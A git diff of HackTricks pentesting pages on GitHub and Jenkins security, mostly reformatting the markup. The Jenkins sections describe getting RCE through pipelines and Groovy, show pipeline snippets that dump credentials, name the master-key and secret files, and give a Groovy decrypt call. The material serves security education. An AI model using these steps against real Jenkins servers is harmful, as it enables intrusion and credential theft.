-* These are the **API Endpoints for Github Applications** [https://docs.github.com/en/rest/overview/endpoints-available-for-github-app](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps). Depending on the permissions of the App it will be able to access some of them
-* You can see installed apps in an **organization** in _https://github.com/organizations/\/settings/installations_
+- To install a GitHub App, you must be an **organisation owner or have admin permissions** in a repository.
+- The GitHub App should **connect to a personal account or an organisation**.
+- You can create your own Github application in [https://github.com/settings/apps](https://github.com/settings/apps)
+- You can see all the **Github applications that has access to your account** in [https://github.com/settings/apps/authorizations](https://github.com/settings/apps/authorizations)
+- These are the **API Endpoints for Github Applications** [https://docs.github.com/en/rest/overview/endpoints-available-for-github-app](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps). Depending on the permissions of the App it will be able to access some of them
+- You can see installed apps in an **organization** in _https://github.com/organizations/\/settings/installations_
 
 Some security recommendations:
 
-* A GitHub App should **take actions independent of a user** (unless the app is using a [user-to-server](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps#user-to-server-requests) token). To keep user-to-server access tokens more secure, you can use access tokens that will expire after 8 hours, and a refresh token that can be exchanged for a new access token. For more information, see "[Refreshing user-to-server access tokens](https://docs.github.com/en/apps/building-github-apps/refreshing-user-to-server-access-tokens)."
-* Make sure the GitHub App integrates with **specific repositories**.
-* The GitHub App should **connect to a personal account or an organisation**.
-* Don't expect the GitHub App to know and do everything a user can.
-* **Don't use a GitHub App if you just need a "Login with GitHub" service**. But a GitHub App can use a [user identification flow](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps) to log users in _and_ do other things.
-* Don't build a GitHub App if you _only_ want to act as a GitHub user and do everything that user can do.
-* If you are using your app with GitHub Actions and want to modify workflow files, you must authenticate on behalf of the user with an OAuth token that includes the `workflow` scope. The user must have admin or write permission to the repository that contains the workflow file. For more information, see "[Understanding scopes for OAuth apps](https://docs.github.com/en/apps/building-oauth-apps/understanding-scopes-for-oauth-apps/#available-scopes)."
-* **More** in [here](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-github-apps).
+- A GitHub App should **take actions independent of a user** (unless the app is using a [user-to-server](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps#user-to-server-requests) token). To keep user-to-server access tokens more secure, you can use access tokens that will expire after 8 hours, and a refresh token that can be exchanged for a new access token. For more information, see "[Refreshing user-to-server access tokens](https://docs.github.com/en/apps/building-github-apps/refreshing-user-to-server-access-tokens)."
+- Make sure the GitHub App integrates with **specific repositories**.
+- The GitHub App should **connect to a personal account or an organisation**.
+- Don't expect the GitHub App to know and do everything a user can.
+- **Don't use a GitHub App if you just need a "Login with GitHub" service**. But a GitHub App can use a [user identification flow](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps) to log users in _and_ do other things.
+- Don't build a GitHub App if you _only_ want to act as a GitHub user and do everything that user can do.
+- If you are using your app with GitHub Actions and want to modify workflow files, you must authenticate on behalf of the user with an OAuth token that includes the `workflow` scope. The user must have admin or write permission to the repository that contains the workflow file. For more information, see "[Understanding scopes for OAuth apps](https://docs.github.com/en/apps/building-oauth-apps/understanding-scopes-for-oauth-apps/#available-scopes)."
+- **More** in [here](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-github-apps).
 
 ### Github Actions
 
@@ -153,11 +140,11 @@ Git actions allows to automate the **execution of code when an event happen**. U
 
 ### Configuration
 
-In _https://github.com/organizations/\/settings/actions_ it's possible to check the **configuration of the github actions** for the organization.
+In _https://github.com/organizations/\/settings/actions_ it's possible to check the **configuration of the github actions** for the organization.
 
 It's possible to disallow the use of github actions completely, **allow all github actions**, or just allow certain actions.
 
-It's also possible to configure **who needs approval to run a Github Action** and the **permissions of the GITHUB\_TOKEN** of a Github Action when it's run.
+It's also possible to configure **who needs approval to run a Github Action** and the **permissions of the GITHUB_TOKEN** of a Github Action when it's run.
 
 ### Git Secrets
 
@@ -169,9 +156,9 @@ These secrets can be configured **for the repo or for all the organization**. Th
 steps:
   - name: Hello world action
     with: # Set the secret as an input
-      super_secret: ${{ secrets.SuperSecret }}
+      super_secret:${{ secrets.SuperSecret }}
     env: # Or as an environment variable
-      super_secret: ${{ secrets.SuperSecret }}
+      super_secret:${{ secrets.SuperSecret }}
 ```
 
 #### Example using Bash 
@@ -179,17 +166,15 @@ steps:
 ```yaml
 steps:
   - shell: bash
-    env:
-      SUPER_SECRET: ${{ secrets.SuperSecret }}
+    env: SUPER_SECRET:${{ secrets.SuperSecret }}
     run: |
       example-command "$SUPER_SECRET"
 ```
 
-{% hint style="warning" %}
-Secrets **can only be accessed from the Github Actions** that have them declared.
+> [!WARNING]
+> Secrets **can only be accessed from the Github Actions** that have them declared.
 
-Once configured in the repo or the organizations **users of github won't be able to access them again**, they just will be able to **change them**.
-{% endhint %}
+> Once configured in the repo or the organizations **users of github won't be able to access them again**, they just will be able to **change them**.
 
 Therefore, the **only way to steal github secrets is to be able to access the machine that is executing the Github Action** (in that scenario you will be able to access only the secrets declared for the Action).
 
@@ -213,7 +198,7 @@ A Github Action can be **executed inside the github environment** or can be exec
 
 Several organizations will allow to run Github Actions in a **third party infrastructure** as it use to be **cheaper**.
 
-You can **list the self-hosted runners** of an organization in _https://github.com/organizations/\/settings/actions/runners_
+You can **list the self-hosted runners** of an organization in _https://github.com/organizations/\/settings/actions/runners_
 
 The way to find which **Github Actions are being executed in non-github infrastructure** is to search for `runs-on: self-hosted` in the Github Action configuration yaml.
 
@@ -225,13 +210,12 @@ If the custom **Github Runner is configured in a machine inside AWS or GCP** for
 
 If all actions (or a malicious action) are allowed a user could use a **Github action** that is **malicious** and will **compromise** the **container** where it's being executed.
 
-{% hint style="danger" %}
-A **malicious Github Action** run could be **abused** by the attacker to:
-
-* **Steal all the secrets** the Action has access to
-* **Move laterally** if the Action is executed inside a **third party infrastructure** where the SA token used to run the machine can be accessed (probably via the metadata service)
-* **Abuse the token** used by the **workflow** to **steal the code of the repo** where the Action is executed or **even modify it**.
-{% endhint %}
+> [!CAUTION]
+> A **malicious Github Action** run could be **abused** by the attacker to:
+>
+> - **Steal all the secrets** the Action has access to
+> - **Move laterally** if the Action is executed inside a **third party infrastructure** where the SA token used to run the machine can be accessed (probably via the metadata service)
+> - **Abuse the token** used by the **workflow** to **steal the code of the repo** where the Action is executed or **even modify it**.
 
 ## Branch Protections
 
@@ -239,48 +223,33 @@ Branch protections are designed to **not give complete control of a repository**
 
 The **branch protections of a repository** can be found in _https://github.com/\/\/settings/branches_
 
-{% hint style="info" %}
-It's **not possible to set a branch protection at organization level**. So all of them must be declared on each repo.
-{% endhint %}
+> [!NOTE]
+> It's **not possible to set a branch protection at organization level**. So all of them must be declared on each repo.
 
 Different protections can be applied to a branch (like to master):
 
-* You can **require a PR before merging** (so you cannot directly merge code over the branch). If this is select different other protections can be in place:
-  * **Require a number of approvals**. It's very common to require 1 or 2 more people to approve your PR so a single user isn't capable of merge code directly.
-  * **Dismiss approvals when new commits are pushed**. If not, a user may approve legit code and then the user could add malicious code and merge it.
-  * **Require reviews from Code Owners**. At least 1 code owner of the repo needs to approve the PR (so "random" users cannot approve it)
-  * **Restrict who can dismiss pull request reviews.** You can specify people or teams allowed to dismiss pull request reviews.
-  * **Allow specified actors to bypass pull request requirements**. These users will be able to bypass previous restrictions.
-* **Require status checks to pass before merging.** Some checks needs to pass before being able to merge the commit (like a github action checking there isn't any cleartext secret).
-* **Require conversation resolution before merging**. All comments on the code needs to be resolved before the PR can be merged.
-* **Require signed commits**. The commits need to be signed.
-* **Require linear history.** Prevent merge commits from being pushed to matching branches.
-* **Include administrators**. If this isn't set, admins can bypass the restrictions.
-* **Restrict who can push to matching branches**. Restrict who can send a PR.
+- You can **require a PR before merging** (so you cannot directly merge code over the branch). If this is select different other protections can be in place:
+  - **Require a number of approvals**. It's very common to require 1 or 2 more people to approve your PR so a single user isn't capable of merge code directly.
+  - **Dismiss approvals when new commits are pushed**. If not, a user may approve legit code and then the user could add malicious code and merge it.
+  - **Require reviews from Code Owners**. At least 1 code owner of the repo needs to approve the PR (so "random" users cannot approve it)
+  - **Restrict who can dismiss pull request reviews.** You can specify people or teams allowed to dismiss pull request reviews.
+  - **Allow specified actors to bypass pull request requirements**. These users will be able to bypass previous restrictions.
+- **Require status checks to pass before merging.** Some checks needs to pass before being able to merge the commit (like a github action checking there isn't any cleartext secret).
+- **Require conversation resolution before merging**. All comments on the code needs to be resolved before the PR can be merged.
+- **Require signed commits**. The commits need to be signed.
+- **Require linear history.** Prevent merge commits from being pushed to matching branches.
+- **Include administrators**. If this isn't set, admins can bypass the restrictions.
+- **Restrict who can push to matching branches**. Restrict who can send a PR.
 
-{% hint style="info" %}
-As you can see, even if you managed to obtain some credentials of a user, **repos might be protected avoiding you to pushing code to master** for example to compromise the CI/CD pipeline.
-{% endhint %}
+> [!NOTE]
+> As you can see, even if you managed to obtain some credentials of a user, **repos might be protected avoiding you to pushing code to master** for example to compromise the CI/CD pipeline.
 
 ## References
 
-* [https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization](https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization)
-* [https://docs.github.com/en/enterprise-server@3.3/admin/user-management/managing-users-in-your-enterprise/roles-in-an-enterprise](https://docs.github.com/en/enterprise-server@3.3/admin/user-management/managing-users-in-your-enterprise/roles-in-an-enterprise)[https://docs.github.com/en/enterprise-server](https://docs.github.com/en/enterprise-server@3.3/admin/user-management/managing-users-in-your-enterprise/roles-in-an-enterprise)
-* [https://docs.github.com/en/get-started/learning-about-github/access-permissions-on-github](https://docs.github.com/en/get-started/learning-about-github/access-permissions-on-github)
-* [https://docs.github.com/en/account-and-profile/setting-up-and-managing-your-github-user-account/managing-user-account-settings/permission-levels-for-user-owned-project-boards](https://docs.github.com/en/account-and-profile/setting-up-and-managing-your-github-user-account/managing-user-account-settings/permission-levels-for-user-owned-project-boards)
-* [https://docs.github.com/en/actions/security-guides/encrypted-secrets](https://docs.github.com/en/actions/security-guides/encrypted-secrets)
+- [https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization](https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization)
+- [https://docs.github.com/en/enterprise-server@3.3/admin/user-management/managing-users-in-your-enterprise/roles-in-an-enterprise](https://docs.github.com/en/enterprise-server@3.3/admin/user-management/managing-users-in-your-enterprise/roles-in-an-enterprise)[https://docs.github.com/en/enterprise-server](https://docs.github.com/en/enterprise-server@3.3/admin/user-management/managing-users-in-your-enterprise/roles-in-an-enterprise)
+- [https://docs.github.com/en/get-started/learning-about-github/access-permissions-on-github](https://docs.github.com/en/get-started/learning-about-github/access-permissions-on-github)
+- [https://docs.github.com/en/account-and-profile/setting-up-and-managing-your-github-user-account/managing-user-account-settings/permission-levels-for-user-owned-project-boards](https://docs.github.com/en/account-and-profile/setting-up-and-managing-your-github-user-account/managing-user-account-settings/permission-levels-for-user-owned-project-boards)
+- [https://docs.github.com/en/actions/security-guides/encrypted-secrets](https://docs.github.com/en/actions/security-guides/encrypted-secrets)
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/pentesting-ci-cd/jenkins-security/README.md b/src/pentesting-ci-cd/jenkins-security/README.md
similarity index 68%
rename from pentesting-ci-cd/jenkins-security/README.md
rename to src/pentesting-ci-cd/jenkins-security/README.md
index e15154aab..944e9cdf9 100644
--- a/pentesting-ci-cd/jenkins-security/README.md
+++ b/src/pentesting-ci-cd/jenkins-security/README.md
@@ -1,27 +1,14 @@
 # Jenkins Security
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../banners/hacktricks-training.md}}
 
 ## Basic Information
 
 Jenkins is a tool that offers a straightforward method for establishing a **continuous integration** or **continuous delivery** (CI/CD) environment for almost **any** combination of **programming languages** and source code repositories using pipelines. Furthermore, it automates various routine development tasks. While Jenkins doesn't eliminate the **need to create scripts for individual steps**, it does provide a faster and more robust way to integrate the entire sequence of build, test, and deployment tools than one can easily construct manually.
 
-{% content-ref url="basic-jenkins-information.md" %}
-[basic-jenkins-information.md](basic-jenkins-information.md)
-{% endcontent-ref %}
+{{#ref}}
+basic-jenkins-information.md
+{{#endref}}
 
 ## Unauthenticated Enumeration
 
@@ -41,19 +28,21 @@ Without credentials you can look inside _**/asynchPeople/**_ path or _**/securit
 
 You may be able to get the Jenkins version from the path _**/oops**_ or _**/error**_
 
-![](<../../.gitbook/assets/image (146).png>)
+![](<../../images/image (146).png>)
 
 ### Known Vulnerabilities
 
-{% embed url="https://github.com/gquere/pwn_jenkins" %}
+{{#ref}}
+https://github.com/gquere/pwn_jenkins
+{{#endref}}
 
 ## Login
 
 In the basic information you can check **all the ways to login inside Jenkins**:
 
-{% content-ref url="basic-jenkins-information.md" %}
-[basic-jenkins-information.md](basic-jenkins-information.md)
-{% endcontent-ref %}
+{{#ref}}
+basic-jenkins-information.md
+{{#endref}}
 
 ### Register
 
@@ -87,15 +76,14 @@ Check: [https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-ab
 
 In these scenarios we are going to suppose you have a valid account to access Jenkins.
 
-{% hint style="warning" %}
-Depending on the **Authorization** mechanism configured in Jenkins and the permission of the compromised user you **might be able or not to perform the following attacks.**
-{% endhint %}
+> [!WARNING]
+> Depending on the **Authorization** mechanism configured in Jenkins and the permission of the compromised user you **might be able or not to perform the following attacks.**
 
 For more information check the basic information:
 
-{% content-ref url="basic-jenkins-information.md" %}
-[basic-jenkins-information.md](basic-jenkins-information.md)
-{% endcontent-ref %}
+{{#ref}}
+basic-jenkins-information.md
+{{#endref}}
 
 ### Listing users
 
@@ -115,7 +103,7 @@ gitleaks detect --no-git -v
 
 If the compromised user has **enough privileges to create/modify a new Jenkins node** and SSH credentials are already stored to access other nodes, he could **steal those credentials** by creating/modifying a node and **setting a host that will record the credentials** without verifying the host key:
 
-![](<../../.gitbook/assets/image (218).png>)
+![](<../../images/image (218).png>)
 
 You will usually find Jenkins ssh credentials in a **global provider** (`/credentials/`), so you can also dump them as you would dump any other secret. More information in the [**Dumping secrets section**](./#dumping-secrets).
 
@@ -129,25 +117,25 @@ By default, Jenkins will **run as SYSTEM**. So, compromising it will give the at
 
 Creating/Modifying a project is a way to obtain RCE over the Jenkins server:
 
-{% content-ref url="jenkins-rce-creating-modifying-project.md" %}
-[jenkins-rce-creating-modifying-project.md](jenkins-rce-creating-modifying-project.md)
-{% endcontent-ref %}
+{{#ref}}
+jenkins-rce-creating-modifying-project.md
+{{#endref}}
 
 ### **RCE Execute Groovy script**
 
 You can also obtain RCE executing a Groovy script, which might my stealthier than creating a new project:
 
-{% content-ref url="jenkins-rce-with-groovy-script.md" %}
-[jenkins-rce-with-groovy-script.md](jenkins-rce-with-groovy-script.md)
-{% endcontent-ref %}
+{{#ref}}
+jenkins-rce-with-groovy-script.md
+{{#endref}}
 
 ### RCE Creating/Modifying Pipeline
 
 You can also get **RCE by creating/modifying a pipeline**:
 
-{% content-ref url="jenkins-rce-creating-modifying-pipeline.md" %}
-[jenkins-rce-creating-modifying-pipeline.md](jenkins-rce-creating-modifying-pipeline.md)
-{% endcontent-ref %}
+{{#ref}}
+jenkins-rce-creating-modifying-pipeline.md
+{{#endref}}
 
 ## Pipeline Exploitation
 
@@ -157,7 +145,7 @@ To exploit pipelines you still need to have access to Jenkins.
 
 **Pipelines** can also be used as **build mechanism in projects**, in that case it can be configured a **file inside the repository** that will contains the pipeline syntax. By default `/Jenkinsfile` is used:
 
-![](<../../.gitbook/assets/image (127).png>)
+![](<../../images/image (127).png>)
 
 It's also possible to **store pipeline configuration files in other places** (in other repositories for example) with the goal of **separating** the repository **access** and the pipeline access.
 
@@ -166,13 +154,12 @@ It's possible that the attacker will need to **bypass some branch protections**
 
 The most common triggers to execute a custom pipeline are:
 
-* **Pull request** to the main branch (or potentially to other branches)
-* **Push to the main branch** (or potentially to other branches)
-* **Update the main branch** and wait until it's executed somehow
+- **Pull request** to the main branch (or potentially to other branches)
+- **Push to the main branch** (or potentially to other branches)
+- **Update the main branch** and wait until it's executed somehow
 
-{% hint style="info" %}
-If you are an **external user** you shouldn't expect to create a **PR to the main branch** of the repo of **other user/organization** and **trigger the pipeline**... but if it's **bad configured** you could fully **compromise companies just by exploiting this**.
-{% endhint %}
+> [!NOTE]
+> If you are an **external user** you shouldn't expect to create a **PR to the main branch** of the repo of **other user/organization** and **trigger the pipeline**... but if it's **bad configured** you could fully **compromise companies just by exploiting this**.
 
 ### Pipeline RCE
 
@@ -201,9 +188,9 @@ pipeline {
 
 For information about how are secrets usually treated by Jenkins check out the basic information:
 
-{% content-ref url="basic-jenkins-information.md" %}
-[basic-jenkins-information.md](basic-jenkins-information.md)
-{% endcontent-ref %}
+{{#ref}}
+basic-jenkins-information.md
+{{#endref}}
 
 Credentials can be **scoped to global providers** (`/credentials/`) or to **specific projects** (`/job//configure`). Therefore, in order to exfiltrate all of them you need to **compromise at least all the projects** that contains secrets and execute custom/poisoned pipelines.
 
@@ -225,7 +212,7 @@ withCredentials([usernamePassword(credentialsId: 'flag2', usernameVariable: 'USE
 withCredentials([string(credentialsId: 'flag1', variable: 'SECRET')]) {
     sh '''
         env #Search for SECRET
-    '''                 
+    '''
 }
 
 withCredentials([usernameColonPassword(credentialsId: 'mylogin', variable: 'USERPASS')]) {
@@ -245,10 +232,9 @@ withCredentials([usernamePassword(credentialsId: 'amazon', usernameVariable: 'US
 
 At the end of this page you can **find all the credential types**: [https://www.jenkins.io/doc/pipeline/steps/credentials-binding/](https://www.jenkins.io/doc/pipeline/steps/credentials-binding/)
 
-{% hint style="warning" %}
-The best way to **dump all the secrets at once** is by **compromising** the **Jenkins** machine (running a reverse shell in the **built-in node** for example) and then **leaking** the **master keys** and the **encrypted secrets** and decrypting them offline.\
-More on how to do this in the [Nodes & Agents section](./#nodes-and-agents) and in the [Post Exploitation section](./#post-exploitation).
-{% endhint %}
+> [!WARNING]
+> The best way to **dump all the secrets at once** is by **compromising** the **Jenkins** machine (running a reverse shell in the **built-in node** for example) and then **leaking** the **master keys** and the **encrypted secrets** and decrypting them offline.\
+> More on how to do this in the [Nodes & Agents section](./#nodes-and-agents) and in the [Post Exploitation section](./#post-exploitation).
 
 ### Triggers
 
@@ -268,13 +254,13 @@ A **Jenkins instance** might have **different agents running in different machin
 
 For more information check the basic information:
 
-{% content-ref url="basic-jenkins-information.md" %}
-[basic-jenkins-information.md](basic-jenkins-information.md)
-{% endcontent-ref %}
+{{#ref}}
+basic-jenkins-information.md
+{{#endref}}
 
 You can enumerate the **configured nodes** in `/computer/`, you will usually find the \*\*`Built-In Node` \*\* (which is the node running Jenkins) and potentially more:
 
-![](<../../.gitbook/assets/image (249).png>)
+![](<../../images/image (249).png>)
 
 It is **specially interesting to compromise the Built-In node** because it contains sensitive Jenkins information.
 
@@ -312,8 +298,8 @@ pipeline {
         }
     }
 
-    post { 
-        always { 
+    post {
+        always {
             cleanWs()
         }
     }
@@ -322,23 +308,23 @@ pipeline {
 
 ## Arbitrary File Read to RCE
 
-{% content-ref url="jenkins-arbitrary-file-read-to-rce-via-remember-me.md" %}
-[jenkins-arbitrary-file-read-to-rce-via-remember-me.md](jenkins-arbitrary-file-read-to-rce-via-remember-me.md)
-{% endcontent-ref %}
+{{#ref}}
+jenkins-arbitrary-file-read-to-rce-via-remember-me.md
+{{#endref}}
 
 ## RCE
 
-{% content-ref url="jenkins-rce-with-groovy-script.md" %}
-[jenkins-rce-with-groovy-script.md](jenkins-rce-with-groovy-script.md)
-{% endcontent-ref %}
+{{#ref}}
+jenkins-rce-with-groovy-script.md
+{{#endref}}
 
-{% content-ref url="jenkins-rce-creating-modifying-project.md" %}
-[jenkins-rce-creating-modifying-project.md](jenkins-rce-creating-modifying-project.md)
-{% endcontent-ref %}
+{{#ref}}
+jenkins-rce-creating-modifying-project.md
+{{#endref}}
 
-{% content-ref url="jenkins-rce-creating-modifying-pipeline.md" %}
-[jenkins-rce-creating-modifying-pipeline.md](jenkins-rce-creating-modifying-pipeline.md)
-{% endcontent-ref %}
+{{#ref}}
+jenkins-rce-creating-modifying-pipeline.md
+{{#endref}}
 
 ## Post Exploitation
 
@@ -354,26 +340,26 @@ You can list the secrets accessing `/credentials/` if you have enough permission
 
 If you can **see the configuration of each project**, you can also see in there the **names of the credentials (secrets)** being use to access the repository and **other credentials of the project**.
 
-![](<../../.gitbook/assets/image (180).png>)
+![](<../../images/image (180).png>)
 
 #### From Groovy
 
-{% content-ref url="jenkins-dumping-secrets-from-groovy.md" %}
-[jenkins-dumping-secrets-from-groovy.md](jenkins-dumping-secrets-from-groovy.md)
-{% endcontent-ref %}
+{{#ref}}
+jenkins-dumping-secrets-from-groovy.md
+{{#endref}}
 
 #### From disk
 
 These files are needed to **decrypt Jenkins secrets**:
 
-* secrets/master.key
-* secrets/hudson.util.Secret
+- secrets/master.key
+- secrets/hudson.util.Secret
 
 Such **secrets can usually be found in**:
 
-* credentials.xml
-* jobs/.../build.xml
-* jobs/.../config.xml
+- credentials.xml
+- jobs/.../build.xml
+- jobs/.../config.xml
 
 Here's a regex to find them:
 
@@ -416,24 +402,11 @@ println(hudson.util.Secret.decrypt("{...}"))
 
 ## References
 
-* [https://github.com/gquere/pwn\_jenkins](https://github.com/gquere/pwn_jenkins)
-* [https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/](https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/)
-* [https://www.pentestgeek.com/penetration-testing/hacking-jenkins-servers-with-no-password](https://www.pentestgeek.com/penetration-testing/hacking-jenkins-servers-with-no-password)
-* [https://www.lazysystemadmin.com/2018/12/quick-howto-reset-jenkins-admin-password.html](https://www.lazysystemadmin.com/2018/12/quick-howto-reset-jenkins-admin-password.html)
-* [https://medium.com/cider-sec/exploiting-jenkins-build-authorization-22bf72926072](https://medium.com/cider-sec/exploiting-jenkins-build-authorization-22bf72926072)
-* [https://medium.com/@Proclus/tryhackme-internal-walk-through-90ec901926d3](https://medium.com/@Proclus/tryhackme-internal-walk-through-90ec901926d3)
+- [https://github.com/gquere/pwn_jenkins](https://github.com/gquere/pwn_jenkins)
+- [https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/](https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/)
+- [https://www.pentestgeek.com/penetration-testing/hacking-jenkins-servers-with-no-password](https://www.pentestgeek.com/penetration-testing/hacking-jenkins-servers-with-no-password)
+- [https://www.lazysystemadmin.com/2018/12/quick-howto-reset-jenkins-admin-password.html](https://www.lazysystemadmin.com/2018/12/quick-howto-reset-jenkins-admin-password.html)
+- [https://medium.com/cider-sec/exploiting-jenkins-build-authorization-22bf72926072](https://medium.com/cider-sec/exploiting-jenkins-build-authorization-22bf72926072)
+- [https://medium.com/@Proclus/tryhackme-internal-walk-through-90ec901926d3](https://medium.com/@Proclus/tryhackme-internal-walk-through-90ec901926d3)
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md b/src/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md
similarity index 63%
rename from pentesting-ci-cd/jenkins-security/basic-jenkins-information.md
rename to src/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md
index 43612a6e6..690b8b314 100644
--- a/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md
+++ b/src/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md
@@ -1,19 +1,6 @@
 # Basic Jenkins Information
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../banners/hacktricks-training.md}}
 
 ## Access
 
@@ -41,30 +28,30 @@ This component provides a built-in SSH server for Jenkins. It’s an alternative
 
 In `/configureSecurity` it's possible to **configure the authorization method of Jenkins**. There are several options:
 
-* **Anyone can do anything**: Even anonymous access can administrate the server
-* **Legacy mode**: Same as Jenkins <1.164. If you have the **"admin" role**, you'll be granted **full control** over the system, and **otherwise** (including **anonymous** users) you'll have **read** access.
-* **Logged-in users can do anything**: In this mode, every **logged-in user gets full control** of Jenkins. The only user who won't have full control is **anonymous user**, who only gets **read access**.
-* **Matrix-based security**: You can configure **who can do what** in a table. Each **column** represents a **permission**. Each **row** **represents** a **user or a group/role.** This includes a special user '**anonymous**', which represents **unauthenticated users**, as well as '**authenticated**', which represents **all authenticated users**.
+- **Anyone can do anything**: Even anonymous access can administrate the server
+- **Legacy mode**: Same as Jenkins <1.164. If you have the **"admin" role**, you'll be granted **full control** over the system, and **otherwise** (including **anonymous** users) you'll have **read** access.
+- **Logged-in users can do anything**: In this mode, every **logged-in user gets full control** of Jenkins. The only user who won't have full control is **anonymous user**, who only gets **read access**.
+- **Matrix-based security**: You can configure **who can do what** in a table. Each **column** represents a **permission**. Each **row** **represents** a **user or a group/role.** This includes a special user '**anonymous**', which represents **unauthenticated users**, as well as '**authenticated**', which represents **all authenticated users**.
 
-![](<../../.gitbook/assets/image (149).png>)
+![](<../../images/image (149).png>)
 
-* **Project-based Matrix Authorization Strategy:** This mode is an **extension** to "**Matrix-based security**" that allows additional ACL matrix to be **defined for each project separately.**
-* **Role-Based Strategy:** Enables defining authorizations using a **role-based strategy**. Manage the roles in `/role-strategy`.
+- **Project-based Matrix Authorization Strategy:** This mode is an **extension** to "**Matrix-based security**" that allows additional ACL matrix to be **defined for each project separately.**
+- **Role-Based Strategy:** Enables defining authorizations using a **role-based strategy**. Manage the roles in `/role-strategy`.
 
 ## **Security Realm**
 
 In `/configureSecurity` it's possible to **configure the security realm.** By default Jenkins includes support for a few different Security Realms:
 
-* **Delegate to servlet container**: For **delegating authentication a servlet container running the Jenkins controller**, such as [Jetty](https://www.eclipse.org/jetty/).
-* **Jenkins’ own user database:** Use **Jenkins’s own built-in user data store** for authentication instead of delegating to an external system. This is enabled by default.
-* **LDAP**: Delegate all authentication to a configured LDAP server, including both users and groups.
-* **Unix user/group database**: **Delegates the authentication to the underlying Unix** OS-level user database on the Jenkins controller. This mode will also allow re-use of Unix groups for authorization.
+- **Delegate to servlet container**: For **delegating authentication a servlet container running the Jenkins controller**, such as [Jetty](https://www.eclipse.org/jetty/).
+- **Jenkins’ own user database:** Use **Jenkins’s own built-in user data store** for authentication instead of delegating to an external system. This is enabled by default.
+- **LDAP**: Delegate all authentication to a configured LDAP server, including both users and groups.
+- **Unix user/group database**: **Delegates the authentication to the underlying Unix** OS-level user database on the Jenkins controller. This mode will also allow re-use of Unix groups for authorization.
 
